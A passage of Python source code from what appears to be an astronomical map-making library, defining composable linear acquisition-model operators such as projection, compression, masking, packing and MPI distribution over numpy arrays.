isinstance(other, np.ndarray):\n return self.matvec(other)\n return Composition([self, other])\n\n def __rmul__(self, other):\n if not _my_isscalar(other):\n raise NotImplementedError(\"It is not possible to multiply '\" + \\\n str(type(other)) + \"' with an AcquisitionModel.\")\n return Composition([other, self])\n\n def __imul__(self, other):\n _tocompositemodel(self, Composition, [copy.copy(self), other])\n return self\n\n def __add__(self, other):\n return Addition([self, other])\n\n def __radd__(self, other):\n return Addition([other, self])\n\n def __iadd__(self, other):\n _tocompositemodel(self, Addition, [copy.copy(self), other])\n return self\n\n def __sub__(self, other):\n return Addition([self, -other])\n\n def __rsub__(self, other):\n return Addition([other, -self])\n\n def __isub__(self, other):\n _tocompositemodel(self, Addition, [copy.copy(self), -other])\n return self\n\n def __neg__(self):\n return Scalar(-1.) 
* self\n\n def __str__(self):\n result = self.description\n if type(self) == Identity:\n result += ' (Identity)'\n if self.shapein is not None or self.shapeout is not None:\n result += ' [input:'\n if self.shapein is None:\n result += 'unconstrained'\n else:\n result += str(self.shapein).replace(' ','')\n result += ', output:'\n if self.shapeout is None:\n result += 'unconstrained'\n else:\n result += str(self.shapeout).replace(' ','')\n result += ']'\n return result\n\n\n#-------------------------------------------------------------------------------\n\n\nclass AcquisitionModelLinear(AcquisitionModel, LinearOperator):\n \"\"\"Abstract class representing a linear instrument acquisition model.\n\n The response y from an input signal x by an acquisition model M is given by\n y = M.direct(x) or y = M(x)\n where x and y can be multidimensional numpy.ndarray.\n The transpose of the acquisition model is\n x = M.transpose(y) or M.T(y)\n This class subclasses the LinearOperator class, so it also provides the\n methods matvec and rmatvec which operate on 1d ndarray.\n\n An acquisition model can be the combination of several submodels\n describing various parts of the instrumental chain:\n M = M3 * M2 * M1 ...\n \"\"\"\n def __init__(self, transpose=None, **keywords):\n AcquisitionModel.__init__(self, **keywords)\n if transpose is not None:\n if not hasattr(transpose, '__call__'):\n raise TypeError('The input transpose method is not callable.')\n self.transpose = transpose\n\n def transpose(self, input, inplace, cachein, cacheout):\n raise NotImplementedError()\n\n def matvec(self, v, inplace=False, cachein=False, cacheout=False):\n v = v.reshape(flatten_sliced_shape(self.shapein))\n return self.direct(v, inplace, cachein, cacheout).ravel()\n\n def rmatvec(self, v, inplace=False, cachein=False, cacheout=False):\n v = v.reshape(flatten_sliced_shape(self.shapeout))\n return self.transpose(v, inplace, cachein, cacheout).ravel()\n\n def dense(self):\n d = np.ndarray(self.shape, dtype=self.dtype)\n v = np.zeros(self.shape[1], dtype=var.FLOAT_DTYPE)\n for i in range(self.shape[1]):\n v[:] = 0\n v[i] = 1\n d[:,i] = self.matvec(v, inplace=True, cachein=True, cacheout=True)\n return d\n\n @property\n def T(self):\n return AcquisitionModelTranspose(self)\n\n\n#-------------------------------------------------------------------------------\n\n\nclass AcquisitionModelTranspose(AcquisitionModelLinear):\n\n def __init__(self, model):\n self.model = model\n AcquisitionModelLinear.__init__(self,\n direct=model.transpose,\n transpose=model.direct,\n cache=model.cache,\n dtype=model.dtype,\n description=model.description + '.T',\n attrin=model.attrout,\n attrout=model.attrin,\n shapein=model.shapeout,\n shapeout=model.shapein,\n typein=model.typeout,\n typeout=model.typein,\n unitin=model.unitout,\n unitout=model.unitin)\n\n @property\n def cachein(self):\n return self.model.cacheout\n\n @cachein.setter\n def cachein(self, cache):\n self.model.cacheout = cache\n \n @property\n def cacheout(self):\n return self.model.cachein\n\n @cacheout.setter\n def cacheout(self, cache):\n self.model.cachein = cache\n \n @property\n def T(self):\n return self.model\n\n def validate_shapein(self, shapein):\n return self.model.validate_shapeout(shapein)\n\n def validate_shapeout(self, shapeout):\n return self.model.validate_shapein(shapeout)\n\n\n#-------------------------------------------------------------------------------\n\n\nclass Composite(AcquisitionModel):\n \"\"\"\n Class for grouping acquisition models\n \"\"\"\n\n def 
__init__(self, models):\n\n models = [ asacquisitionmodel(m) for m in models ]\n self.blocks = []\n\n for model in models:\n if isinstance(model, self.__class__):\n self.blocks.extend(model.blocks)\n else:\n self.blocks.append(model)\n\n AcquisitionModel.__init__(self)\n\n if all([hasattr(m, 'matvec') for m in self.blocks]):\n self.matvec = \\\n lambda v, inplace=False, cachein=False, cacheout=False: \\\n self.direct(v.reshape(flatten_sliced_shape(self.shapein)),\n inplace, cachein, cacheout).ravel()\n def dense():\n d = np.ndarray(self.shape, dtype=self.dtype)\n v = np.zeros(self.shape[1], dtype=var.FLOAT_DTYPE)\n for i in range(self.shape[1]):\n v[:] = 0\n v[i] = 1\n d[:,i] = self.matvec(v, True, True, True)\n return d\n self.dense = dense\n\n if all([hasattr(m, 'rmatvec') for m in self.blocks]):\n self.rmatvec = \\\n lambda v, inplace=False, cachein=False, cacheout=False: \\\n self.transpose(v.reshape(flatten_sliced_shape(\n self.shapeout)), inplace, cachein, cacheout).ravel()\n\n @property\n def dtype(self):\n for block in self.blocks:\n if block.dtype.type in (np.complex64, np.complex128, np.complex256):\n return block.dtype\n return var.FLOAT_DTYPE\n\n @dtype.setter\n def dtype(self, dtype):\n pass\n\n @property\n def T(self):\n return AcquisitionModelTranspose(self)\n\n @property\n def typein(self):\n for model in reversed(self.blocks):\n if model.typein is not None:\n return model.typein\n return np.ndarray\n\n @typein.setter\n def typein(self, value):\n pass\n\n @property\n def typeout(self):\n for model in reversed(self.blocks):\n if model.typeout is not None:\n return model.typeout\n return np.ndarray\n\n @typeout.setter\n def typeout(self, value):\n pass\n\n @property\n def unitin(self):\n for model in reversed(self.blocks):\n if len(model.unitin) > 0:\n return model.unitin\n return {}\n\n @unitin.setter\n def unitin(self, value):\n pass\n\n @property\n def unitout(self):\n for model in self.blocks:\n if len(model.unitout) > 0:\n return model.unitout\n return {}\n\n @unitout.setter\n def unitout(self, value):\n pass\n\n def validate_input(self, input, shape):\n input = np.array(input, ndmin=1, subok=True, copy=False)\n if shape is not None and type(shape[-1]) is tuple:\n input = Tod(input, nsamples=shape[-1], copy=False)\n return input\n\n def __str__(self):\n result = AcquisitionModel.__str__(self) + ':'\n components = []\n for block in self.blocks:\n components.extend(str(block).split('\\n'))\n result += '\\n '+'\\n '.join(components)\n return result\n\n\n#-------------------------------------------------------------------------------\n\n\nclass Addition(Composite):\n \"\"\"\n Class for acquisition models addition\n\n If at least one of the input already is the result of an addition,\n a flattened list of operators is created by associativity, in order to\n benefit from the AcquisitionModel's caching mechanism.\n \"\"\"\n\n def direct(self, input, inplace, cachein, cacheout):\n input = self.validate_input(input, self.shapein)\n output = self.blocks[0].direct(input, False, False, False)\n for i, model in enumerate(self.blocks[1:]):\n last = i == len(self.blocks) - 2\n tmf.add_inplace(np.array(output, ndmin=1, copy=False).T,\n np.array(model.direct(input, inplace and last,\n cachein, cacheout), ndmin=1, copy=False).T)\n return output\n\n def transpose(self, input, inplace, cachein, cacheout):\n input = self.validate_input(input, self.shapeout)\n output = self.blocks[0].transpose(input, False, False, False)\n for i, model in enumerate(self.blocks[1:]):\n last = i == 
len(self.blocks) - 2\n tmf.add_inplace(np.array(output, ndmin=1, copy=False).T,\n np.array(model.transpose(input, inplace and last,\n cachein, cacheout), ndmin=1, copy=False).T)\n return output\n\n @property\n def shapein(self):\n shapein = None\n for model in self.blocks:\n shapein_ = model.shapein\n if shapein_ is None:\n continue\n if shapein is None or type(shapein_[-1]) is tuple:\n shapein = shapein_\n continue\n if flatten_sliced_shape(shapein) != flatten_sliced_shape(shapein_):\n raise ValidationError(\"Incompatible shape in operands: '\" + \\\n str(shapein) +\"' and '\" + str(shapein_) + \"'.\")\n return shapein\n\n @shapein.setter\n def shapein(self, value):\n pass\n\n @property\n def shapeout(self):\n shapeout = None\n for model in self.blocks:\n shapeout_ = model.shapeout\n if shapeout_ is None:\n continue\n if shapeout is None or type(shapeout_[-1]) is tuple:\n shapeout = shapeout_\n continue\n if flatten_sliced_shape(shapeout) != \\\n flatten_sliced_shape(shapeout_):\n raise ValidationError(\"Incompatible shape in operands: '\" + \\\n str(shapeout) +\"' and '\" + str(shapeout_) + \"'.\")\n return shapeout\n\n @shapeout.setter\n def shapeout(self, value):\n pass\n\n @property\n def T(self):\n return Addition([model.T for model in self.blocks])\n\n def __iadd__(self, other):\n oldblocks = self.blocks\n if isinstance(other, Addition):\n self.blocks.extend(other.blocks)\n else:\n self.blocks.append(asacquisitionmodel(other))\n try:\n shapein = self.shapein\n shapeout = self.shapeout\n except ValidationError as errmsg:\n self.blocks = oldblocks\n raise ValidationError(errmsg)\n return self\n\n def __isub__(self, other):\n return self.__iadd__(-other)\n\n\n#-------------------------------------------------------------------------------\n\n\nclass Composition(Composite):\n \"\"\"\n Class for acquisition models composition\n\n If at least one of the input already is the result of a composition,\n a flattened list of operators is created by associativity, in order to\n benefit from the AcquisitionModel's caching mechanism.\n \"\"\"\n\n def direct(self, input, inplace, cachein, cacheout):\n input = self.validate_input(input, self.shapein)\n caches = [m.cache for m in self.blocks]\n if any(caches):\n first_cache = caches.index(True)\n last_cache = len(self.blocks) - caches.index(True) - 1\n else:\n first_cache = len(self.blocks)\n last_cache = -1\n for i, model in enumerate(reversed(self.blocks)):\n input = model.direct(input, inplace or i != 0,\n cachein or i > first_cache,\n cacheout or i < last_cache)\n return input\n\n def transpose(self, input, inplace, cachein, cacheout):\n input = self.validate_input(input, self.shapeout)\n caches = [m.cache for m in self.blocks]\n first_cache = len(self.blocks) - caches.index(True) - 1\n last_cache = caches.index(True)\n for i, model in enumerate(self.blocks):\n input = model.transpose(input, inplace or i != 0,\n cachein or i > first_cache,\n cacheout or i < last_cache)\n return input\n\n @property\n def shapein(self):\n shapeout = None\n for model in self.blocks:\n shapeout = model.validate_shapeout(shapeout)\n return shapeout\n\n @shapein.setter\n def shapein(self, value):\n pass\n\n @property\n def shapeout(self):\n shapein = None\n for model in reversed(self.blocks):\n shapein = model.validate_shapein(shapein)\n return shapein\n\n @shapeout.setter\n def shapeout(self, value):\n pass\n\n @property\n def T(self):\n return Composition([model.T for model in reversed(self.blocks)])\n\n def __imul__(self, other):\n oldblocks = self.blocks\n 
self.blocks.append(asacquisitionmodel(other))\n try:\n shapein = self.shapein\n shapeout = self.shapeout\n except ValidationError as errmsg:\n self.blocks = oldblocks\n raise ValidationError(errmsg)\n return self\n\n\n#-------------------------------------------------------------------------------\n\n\nclass Square(object):\n \"\"\"\n Square operator\n \n The input and output must have the same shape\n This operator does not implement the cache mechanism, but operation on\n the input can be done inplace or on a copy.\n \"\"\"\n\n def __init__(self, shapein=None, **keywords):\n self.shapeout = shapein\n self.validate_shapeout = self.validate_shapein\n \n\n#-------------------------------------------------------------------------------\n\n\nclass Symmetric(AcquisitionModelLinear, Square):\n \"\"\"Symmetric operator\"\"\"\n\n def __init__(self, **keywords):\n AcquisitionModelLinear.__init__(self, **keywords)\n Square.__init__(self, **keywords)\n self.transpose = self.direct\n self.rmatvec = self.matvec\n\n @property\n def T(self):\n return self\n\n\n#-------------------------------------------------------------------------------\n\n\nclass Diagonal(Symmetric):\n \"\"\"\n Diagonal operator.\n\n Multiply by a diagonal matrix. The input of a Diagonal instance can be of\n rank greater than the specified diagonal array, in which case the latter\n is broadcast along the fast dimensions.\n \"\"\"\n\n def __init__(self, diagonal, **keywords):\n diagonal = np.array(diagonal, dtype=var.get_default_dtype(diagonal),\n order='c')\n Symmetric.__init__(self, dtype=diagonal.dtype, **keywords)\n self.isscalar = diagonal.ndim == 0\n self.data = np.array(diagonal, ndmin=1, copy=False)\n\n def direct(self, input, inplace, cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n if self.dtype == var.FLOAT_DTYPE:\n tmf.multiply_inplace(output.T, self.data.T)\n else:\n output.T[:] *= self.data.T\n return output\n\n def validate_shapein(self, shapein):\n if shapein is None:\n return self.shapein\n if self.isscalar:\n return shapein\n if flatten_sliced_shape(shapein[0:self.data.ndim]) != self.data.shape:\n raise ValueError('The input has an incompatible shape ' + \\\n str(shapein) + '.')\n return shapein\n\n def matvec(self, v, inplace=False, cachein=False, cacheout=False):\n shape = list(self.data.shape)\n shape.append(-1)\n v = v.reshape(shape)\n return self.direct(v, inplace, cachein, cacheout).ravel()\n\n\nclass Offset(AcquisitionModel, Square):\n \"\"\"\n Offset operator.\n\n Add an offset to the input. The input of an Offset instance can be of rank\n greater than the specified diagonal array, in which case the latter is\n broadcast along the fast dimensions. 
This operator is not linear.\n \"\"\"\n def __init__(self, offset, **keywords):\n offset = np.array(offset, dtype=var.get_default_dtype(offset),\n order='c')\n AcquisitionModel.__init__(self, dtype=offset.dtype, **keywords)\n Square.__init__(self, **keywords)\n self.isscalar = offset.ndim == 0\n self.data = np.array(offset, ndmin=1, copy=False)\n\n def direct(self, input, inplace, cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n if self.dtype == var.FLOAT_DTYPE:\n tmf.add_inplace(output.T, self.data.T)\n else:\n output.T[:] += self.data.T\n return output\n\n def validate_shapein(self, shapein):\n if shapein is None:\n return self.shapein\n if self.isscalar:\n return shapein\n if flatten_sliced_shape(shapein[0:self.data.ndim]) != self.data.shape:\n raise ValueError('The input has an incompatible shape ' + \\\n str(shapein) + '.')\n return shapein\n\n def matvec(self, v, inplace=False, cachein=False, cacheout=False):\n shape = list(self.data.shape)\n shape.append(-1)\n v = v.reshape(shape)\n return self.direct(v, inplace, cachein, cacheout).ravel()\n\n\n#-------------------------------------------------------------------------------\n\n\nclass Rounding(AcquisitionModel, Square):\n \"\"\"Rounding operator.\n \n The rounding method may be one of the following:\n - rtz : round towards zero (truncation)\n - rti : round towards infinity\n - rtmi : round towards minus infinity (floor)\n - rtpi : round towards positive infinity (ceil)\n - rhtz : round half towards zero\n - rhti : round half towards infinity (numpy's round, fortran's nint)\n - rhtmi : round half towards minus infinity\n - rhtpi : round half towards positive infinity\n - rhs : round half stochastically\n \"\"\"\n\n def __init__(self, method='rhti', **keywords):\n AcquisitionModel.__init__(self, **keywords)\n Square.__init__(self, **keywords)\n method = method.lower()\n table = {'rtz' : tmf.round_rtz,\n 'rti' : tmf.round_rti,\n 'rtmi' : tmf.round_rtmi,\n 'rtpi' : tmf.round_rtpi,\n 'rhtz' : tmf.round_rhtz,\n 'rhti' : tmf.round_rhti,\n 'rhtmi' : tmf.round_rhtmi,\n 'rhtpi' : tmf.round_rhtpi,\n 'rhs' : tmf.round_rhs}\n if method not in table:\n raise ValueError('The rounding method must be one of the following'\\\n ': ' + ','.join(\"'\" + k + \"'\" for k in table.keys()) + '.')\n self.round = table[method]\n\n def direct(self, input, inplace, cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n self.round(output.T)\n return output\n\n\n#-------------------------------------------------------------------------------\n\n\nclass DiscreteDifference(AcquisitionModelLinear, Square):\n \"\"\"\n Discrete difference operator.\n\n Calculate the nth order discrete difference along given axis.\n \"\"\"\n\n def __init__(self, axis=0, n=1, comm=None, **keywords):\n AcquisitionModelLinear.__init__(self, **keywords)\n Square.__init__(self, **keywords)\n self.n = n\n self.axis = axis\n self.comm = comm or var.comm_map\n\n def direct(self, input, inplace, cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n for i in range(self.n):\n diff(output, self.axis, comm=self.comm)\n return output\n\n def transpose(self, input, inplace, cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n for i in range(self.n):\n diffT(output, self.axis, comm=self.comm)\n return output \n\n\n#-------------------------------------------------------------------------------\n\n\nclass DdTdd(Symmetric):\n \"\"\"Calculate operator dX.T dX along a given axis.\"\"\"\n\n def __init__(self, 
axis=0, scalar=1., description=None, comm=None,\n **keywords):\n if description is None and scalar != 1.:\n description = str(scalar) + ' DdTdd'\n Symmetric.__init__(self, **keywords)\n self.axis = axis\n self.scalar = scalar\n self.comm = comm or var.comm_map\n\n def direct(self, input, inplace, cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n diffTdiff(output, self.axis, self.scalar, comm=self.comm)\n return output\n\n \n#-------------------------------------------------------------------------------\n\n\nclass Projection(AcquisitionModelLinear):\n \"\"\"\n This class handles operations by the pointing matrix\n\n The input observation has the following required attributes/methods:\n - nfinesamples\n - nsamples\n - ndetectors\n - get_pointing_matrix()\n - unit\n The instance has the following specific attributes:\n - header: the FITS header of the map\n - pmatrix: transparent view of the pointing matrix\n - _pmatrix: opaque representation of the pointing matrix\n - npixels_per_sample: maximum number of sky map pixels that can be\n intercepted by a detector\n \"\"\"\n\n def __init__(self, observation, method=None, header=None, resolution=None,\n npixels_per_sample=0, oversampling=True, comm_map=None,\n packed=False, description=None):\n\n self.comm_map = comm_map or var.comm_map\n self.comm_tod = observation.comm_tod\n\n self.method, pmatrix, self.header, self.ndetectors, nsamples, \\\n self.npixels_per_sample, (unitout, unitin), (duout, duin) = \\\n observation.get_pointing_matrix(header,\n resolution,\n npixels_per_sample,\n method=method,\n oversampling=oversampling)\n\n self.nsamples_tot = int(np.sum(nsamples))\n self._pmatrix = pmatrix\n if self.npixels_per_sample == 0:\n pmatrix = np.empty(0, dtype=np.int64)\n self.pmatrix = pmatrix.view([('weight', 'f4'), ('pixel', 'i4')]) \\\n .view(np.recarray)\n self.pmatrix.shape = (self.ndetectors, np.sum(nsamples),\n self.npixels_per_sample)\n\n shapein = tuple([self.header['NAXIS'+str(i+1)] for i in \\\n range(self.header['NAXIS'])])[::-1]\n mask = Map.empty(shapein, dtype=np.bool8, header=self.header)\n tmf.pointing_matrix_mask(self._pmatrix, mask.view(np.int8).T, \n self.npixels_per_sample, self.nsamples_tot, self.ndetectors)\n\n ismapdistributed = self.comm_map.Get_size() > 1\n istoddistributed = self.comm_tod.Get_size() > 1\n self.ispacked = packed or ismapdistributed\n if self.ispacked:\n tmf.pointing_matrix_pack(self._pmatrix, mask.view(np.int8).T,\n self.npixels_per_sample, self.nsamples_tot, self.ndetectors)\n shapein = (int(np.sum(~mask)))\n\n attrin = {'header' : self.header}\n if duin is not None:\n attrin['derived_units'] = duin\n attrout = {}\n if duout is not None:\n attrout['derived_units'] = duout\n shapeout = combine_sliced_shape(self.ndetectors, nsamples)\n AcquisitionModelLinear.__init__(self,\n cache=True,\n description=description,\n attrin=attrin,\n attrout=attrout,\n shapein=shapein,\n shapeout=shapeout,\n typein=Map,\n typeout=Tod,\n unitin=unitin,\n unitout=unitout)\n self.mask = mask\n if not self.ispacked and not istoddistributed:\n return\n\n if self.ispacked:\n if ismapdistributed:\n self *= DistributionLocal(self.mask)\n else:\n self *= Packing(self.mask)\n elif istoddistributed:\n self *= DistributionGlobal(self.shapein, share=True,\n comm=self.comm_tod)\n s = self.blocks[0]\n self.header = s.header\n self.mask = s.mask\n self.method = s.method\n self.ndetectors = s.ndetectors\n self.npixels_per_sample = s.npixels_per_sample\n self.nsamples_tot = s.nsamples_tot\n self.pmatrix = 
s.pmatrix\n\n def direct(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_direct(input, cachein, cacheout)\n tmf.pointing_matrix_direct(self._pmatrix, input.T, output.T,\n self.npixels_per_sample)\n return output\n\n def transpose(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_transpose(input, cachein, cacheout)\n tmf.pointing_matrix_transpose(self._pmatrix, input.T, output.T, \n self.npixels_per_sample)\n return output\n\n def get_ptp(self):\n npixels = np.product(self.shapein)\n return tmf.pointing_matrix_ptp(self._pmatrix, self.npixels_per_sample,\n self.nsamples_tot, self.ndetectors, npixels).T\n\n\n#-------------------------------------------------------------------------------\n\n\nclass DistributionGlobal(AcquisitionModelLinear):\n \"\"\"\n Distribute a global map to different MPI processes.\n By default, they are locally distributed, in the sense that an MPI process\n will only handle a subset of the global map.\n \"\"\"\n\n def __init__(self, shape, share=False, comm=None, **keywords):\n\n if comm is None:\n comm = var.comm_map\n self.comm = comm\n\n # if share is true, the maps are not distributed\n if share:\n def direct(input, inplace, cachein, cacheout):\n return self.validate_input_inplace(input, inplace)\n def transpose(input, inplace, cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n if self.comm.Get_size() > 1:\n self.comm.Allreduce(MPI.IN_PLACE, [output, MPI.DOUBLE],\n op=MPI.SUM)\n return output\n AcquisitionModelLinear.__init__(self, shapein=shape, typein=Map,\n direct=direct, transpose=transpose,\n cache=False, **keywords)\n return\n\n shapeout = split_shape(shape, comm)\n self.counts = []\n self.offsets = [0]\n for rank in range(comm.Get_size()):\n s = split_work(shape[0], rank=rank, comm=comm)\n n = (s.stop - s.start) * np.product(shape[1:])\n self.counts.append(n)\n self.offsets.append(self.offsets[-1] + n)\n self.offsets.pop()\n attrin = { 'comm':MPI.COMM_SELF, 'shape_global':shape }\n attrout = { 'comm':self.comm, 'shape_global':shape }\n AcquisitionModelLinear.__init__(self, cache=True, shapein=shape,\n shapeout=shapeout, attrin=attrin, attrout=attrout, typein=Map,\n **keywords)\n\n def direct(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_direct(input, cachein, cacheout)\n s = split_work(self.shapein[0], comm=self.comm)\n n = s.stop - s.start\n output[0:n] = input[s.start:s.stop]\n output[n:] = 0\n return output\n\n def transpose(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_transpose(input, cachein, cacheout)\n s = split_work(self.shapein[0], comm=self.comm)\n n = s.stop - s.start\n self.comm.Allgatherv([input[0:n], MPI.DOUBLE], [output, (self.counts,\n self.offsets), MPI.DOUBLE])\n return output\n\n\n#-------------------------------------------------------------------------------\n\n\nclass DistributionLocal(AcquisitionModelLinear):\n \"\"\"\n Scatter a distributed map to different MPI processes under the control of a\n local non-distributed mask.\n \"\"\"\n\n def __init__(self, mask, operator=MPI.SUM, comm=None, **keywords):\n if comm is None:\n comm = var.comm_map\n shapeout = (int(np.sum(~mask)),)\n shapein = split_shape(mask.shape, comm)\n attrin = { 'comm':comm, 'shape_global':mask.shape }\n attrout = { 'comm':MPI.COMM_SELF, 'shape_global':shapeout}\n AcquisitionModelLinear.__init__(self, cache=True, typein=Map,\n shapein=shapein, shapeout=shapeout, attrin=attrin, **keywords)\n self.comm = comm\n 
self.mask = mask\n self.operator = operator\n\n def direct(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_direct(input, cachein, cacheout)\n status = tmf.mpi_allscatterlocal(input.T, self.mask.view(np.int8).T,\n output.T, self.comm.py2f())\n if status == 0: return output\n if status < 0:\n raise RuntimeError('Incompatible sizes.')\n raise MPI.Exception(status)\n\n def transpose(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_transpose(input, cachein, cacheout)\n status = tmf.mpi_allreducelocal(input.T, self.mask.view(np.int8).T,\n output.T, self.operator.py2f(), self.comm.py2f())\n if status == 0: return output\n if status < 0:\n raise RuntimeError('Incompatible mask.')\n raise MPI.Exception(status)\n\n\n#-------------------------------------------------------------------------------\n\n\nclass Compression(AcquisitionModelLinear):\n \"\"\"\n Abstract class for compressing the input signal.\n \"\"\"\n\n def __init__(self, compression_factor, shapein=None, **keywords):\n if _my_isscalar(compression_factor):\n compression_factor = (compression_factor,)\n self.factor = np.array(compression_factor, int)\n\n if np.all(self.factor == 1):\n def direct(input, inplace, cachein, cacheout):\n return self.validate_input_inplace(input, inplace)\n transpose = direct\n cache = False\n else:\n direct = None\n transpose = None\n cache = True\n shapeout = self.validate_shapein(shapein)\n AcquisitionModelLinear.__init__(self,\n direct=direct,\n transpose=transpose,\n cache=cache,\n shapein=shapein,\n shapeout=shapeout,\n typein=Tod,\n **keywords)\n\n def validate_shapein(self, shapein):\n if shapein is None:\n return None\n if np.any(np.array(shapein[-1]) % self.factor != 0):\n raise ValidationError('The input timeline size ('+str(shapein[-1])+\\\n ') is not an integer times the compression factor (' + \\\n str(self.factor)+').')\n return combine_sliced_shape(shapein[0:-1],\n np.array(shapein[-1]) / self.factor)\n\n def validate_shapeout(self, shapeout):\n if shapeout is None:\n return None\n if self.shapeout is not None and flatten_sliced_shape(shapeout) == \\\n flatten_sliced_shape(self.shapeout):\n return self.shapein\n return combine_sliced_shape(shapeout[0:-1],\n np.array(shapeout[-1]) * self.factor)\n\n def __str__(self):\n return super(Compression, self).__str__()+' (x'+str(self.factor)+')'\n \n\n#-------------------------------------------------------------------------------\n\n\nclass CompressionAverage(Compression):\n \"\"\"\n Compress the input signal by averaging blocks of specified size.\n \"\"\"\n\n def direct(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_direct(input, cachein, cacheout)\n tmf.compression_average_direct(input.T, output.T,\n np.array(input.nsamples, np.int32), self.factor.astype(np.int32))\n return output\n\n def transpose(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_transpose(input, cachein, cacheout)\n tmf.compression_average_transpose(input.T, output.T,\n np.array(input.nsamples, np.int32), self.factor.astype(np.int32))\n return output\n\n\n#-------------------------------------------------------------------------------\n\n\nclass DownSampling(Compression):\n \"\"\"\n Downsample the input signal by picking up one sample out of a number\n specified by the compression factor\n \"\"\"\n\n def direct(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_direct(input, cachein, cacheout)\n tmf.downsampling_direct(input.T, 
output.T,\n np.array(input.nsamples, np.int32), self.factor.astype(np.int32))\n return output\n\n def transpose(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_transpose(input, cachein, cacheout)\n tmf.downsampling_transpose(input.T, output.T,\n np.array(input.nsamples, np.int32), self.factor.astype(np.int32))\n return output\n \n\n#-------------------------------------------------------------------------------\n\n\nclass Identity(Symmetric):\n \"\"\"\n Identity class.\n \"\"\"\n\n def __init__(self, **keywords):\n Symmetric.__init__(self, **keywords)\n\n def direct(self, input, inplace, cachein, cacheout):\n return self.validate_input_inplace(input, inplace)\n \n\n#-------------------------------------------------------------------------------\n\n\nclass Scalar(Diagonal):\n \"\"\"\n Class for scalar multiplication\n \"\"\"\n\n def __init__(self, value, **keywords):\n if not np.iscomplex(value):\n value = np.real(value)\n Diagonal.__init__(self, value, **keywords)\n \n def __str__(self):\n return super(self.__class__, self).__str__()+' (' + \\\n str(self.data) + ')'\n \n\n#-------------------------------------------------------------------------------\n\n\nclass Masking(Symmetric):\n \"\"\"\n Mask operator.\n\n Sets to zero values whose mask is True (non-null). The input of a Masking\n instance can be of rank greater than the speficied mask, in which case the\n latter is broadcast along the fast dimensions.\n \"\"\"\n\n def __init__(self, mask, **keywords):\n Symmetric.__init__(self, dtype=var.FLOAT_DTYPE, **keywords)\n if mask is None:\n print('Warning: input mask is None.')\n mask = False\n mask = np.array(mask, order='c', dtype=np.bool8)\n self.isscalar = mask.ndim == 0\n self.mask = np.array(mask, ndmin=1, copy=False)\n\n def direct(self, input, inplace, cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n status = tmf.masking(output.T, self.mask.view(np.int8).T)\n if status != 0: raise RuntimeError()\n return output\n\n def validate_shapein(self, shapein):\n if shapein is None:\n return self.shapein\n if self.isscalar:\n return shapein\n if flatten_sliced_shape(shapein[0:self.mask.ndim]) != self.mask.shape:\n raise ValueError('The input has shape ' + str(shapein) + ' incomp' \\\n 'atible with that of the mask ' + str(self.mask.shape) + '.')\n return shapein\n\n\n#-------------------------------------------------------------------------------\n\n\nclass Unpacking(AcquisitionModelLinear):\n \"\"\"\n Convert 1d map into an nd array, under the control of a mask.\n The elements for which the mask is True are equal to the field argument.\n \"\"\"\n\n def __init__(self, mask, field=0., **keywords):\n mask = np.array(mask, np.bool8)\n AcquisitionModelLinear.__init__(self,\n cache=True,\n shapein=np.sum(mask == 0),\n shapeout=mask.shape,\n **keywords)\n self.mask = mask\n self.field = field\n\n def direct(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_direct(input, cachein, cacheout)\n tmf.unpack_direct(input.T, self.mask.view(np.int8).T, output.T,\n self.field)\n return output\n\n def transpose(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_transpose(input, cachein, cacheout)\n tmf.unpack_transpose(input.T, self.mask.view(np.int8).T, output.T)\n return output\n\n\n#-------------------------------------------------------------------------------\n\n\nclass Packing(AcquisitionModelLinear):\n \"\"\"\n Convert an nd array in a 1d map, under the control of a mask.\n The elements 
for which the mask is True are equal to the field argument.\n \"\"\"\n\n def __init__(self, mask, field=0., **keywords):\n mask = np.array(mask, np.bool8)\n AcquisitionModelLinear.__init__(self,\n cache=True,\n shapein=mask.shape,\n shapeout=np.sum(mask == 0),\n **keywords)\n self.mask = mask\n self.field = field\n\n def direct(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_direct(input, cachein, cacheout)\n tmf.unpack_transpose(input.T, self.mask.view(np.int8).T, output.T)\n return output\n\n def transpose(self, input, inplace, cachein, cacheout):\n input, output = self.validate_input_transpose(input, cachein, cacheout)\n tmf.unpack_direct(input.T, self.mask.view(np.int8).T, output.T,\n self.field)\n return output\n\n\n#-------------------------------------------------------------------------------\n\n\nclass Reshaping(AcquisitionModelLinear):\n \"\"\"\n Reshape arrays\n \"\"\"\n\n def __init__(self, shapein, shapeout, **keywords):\n if shapein is None or shapeout is None:\n raise ValueError('The shapes are not defined.')\n if np.product(flatten_sliced_shape(shapein)) != \\\n np.product(flatten_sliced_shape(shapeout)):\n raise ValueError('The number of elements of the input and output o'\\\n 'f the Reshaping operator are incompatible.')\n AcquisitionModelLinear.__init__(self, shapein=shapein,\n shapeout=shapeout, **keywords)\n\n def direct(self, input, inplace, cachein, cacheout):\n output = self.validate_input_direct(input, inplace)\n output = _smart_reshape(output, self.shapeout)\n return output\n\n def transpose(self, input, inplace, cachein, cacheout):\n output = self.validate_input_transpose(input, inplace)\n output = _smart_reshape(output, self.shapein)\n return output\n\n def validate_input_direct(self, input, inplace):\n input = np.array(input, ndmin=1, copy=not inplace, subok=True)\n shapeout = self.validate_shapein(input.shape)\n return input\n\n def validate_input_transpose(self, input, inplace):\n input = np.array(input, ndmin=1, copy=not inplace, subok=True)\n shapeout = self.validate_shapeout(input.shape)\n return input\n\n\n#-------------------------------------------------------------------------------\n\n\nclass 